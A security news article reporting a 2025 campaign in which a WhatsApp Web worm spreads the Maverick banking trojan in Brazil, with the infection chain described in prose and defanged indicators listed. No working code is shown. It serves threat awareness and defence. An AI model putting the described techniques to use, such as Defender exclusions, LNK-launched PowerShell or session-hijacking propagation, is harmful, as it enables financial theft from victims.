Security researchers from Dell’s Counter Threat Unit™ (CTU) and Sophos have uncovered an active malware campaign exploiting the WhatsApp Web platform to spread a self-propagating worm that installs Brazilian banking trojans and cryptocurrency credential stealers.
The campaign, which began on September 29, 2025, primarily targets users in Brazil and leverages deceptive messages and malicious ZIP attachments to compromise victims’ systems.
The attack starts when victims receive a message from an infected WhatsApp contact containing a ZIP archive, often named to appear as legitimate financial or business documents such as “ORCAMENTO_XXXXXXX.zip” (Budget) or “COMPROVANTE_20251002_XXXXXXX.zip” (Voucher).
The message claims the file can only be viewed on a computer, encouraging users to open it via WhatsApp Web on desktop devices.
Inside the ZIP archive is a Windows shortcut (LNK) file that appears to be a document but actually executes a hidden PowerShell command when clicked.
This command uses obfuscated Base64-encoded content to spawn an Explorer process, which downloads a follow-up script from a remote command-and-control (C2) server hosted on hxxps://www.zapgrande[.]com.
According to Sophos telemetry, similar activity was detected across more than 1,000 endpoints in 400 environments within the first week of the campaign.
The downloaded second-stage PowerShell script includes comments in Portuguese referring to actions such as disabling User Account Control (UAC) and adding Microsoft Defender exclusions.
These modifications are intended to weaken endpoint security before downloading additional payloads. In observed cases, the commands enabled the attacker to bypass standard Windows defense mechanisms, ensuring smoother execution of subsequent malware components.
Two payloads were identified during analysis: a browser automation module using the legitimate Selenium framework with a ChromeDriver instance, and a stealthy .NET-based banking trojan known as Maverick.
The Selenium component grants attackers remote control of active browser sessions, allowing them to hijack WhatsApp Web sessions and automatically propagate infection links to new targets.
Meanwhile, Maverick closely monitors browser activity for traffic related to leading Brazilian financial institutions and cryptocurrency exchanges.
When a target domain is detected, the malware injects a second-stage banking trojan that captures credentials and session data to enable fraudulent transactions.
Researchers are exploring possible links between Maverick and the earlier Coyote banking trojan, which in 2024–2025 was delivered through malicious LNK files and multi-stage PowerShell infection chains.
The overlapping techniques, infrastructure, and language artifacts suggest that Maverick could be an evolved version of Coyote optimized for WhatsApp-based propagation.
Organizations are urged to warn employees against opening ZIP attachments received through messaging platforms and to investigate abnormal PowerShell activity promptly to stop lateral spread.
| Indicator Type | Example Value |
|---|---|
| C2 Domain | hxxps://www.zapgrande[.]com |
| Malicious File Names | ORCAMENTO_XXXXXXX.zip, COMPROVANTE_20251002_XXXXXXX.zip, NEW-20251001_150505-XXX_XXXXXXX.zip |
| Payloads | Selenium automation tool, Maverick banking trojan |
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
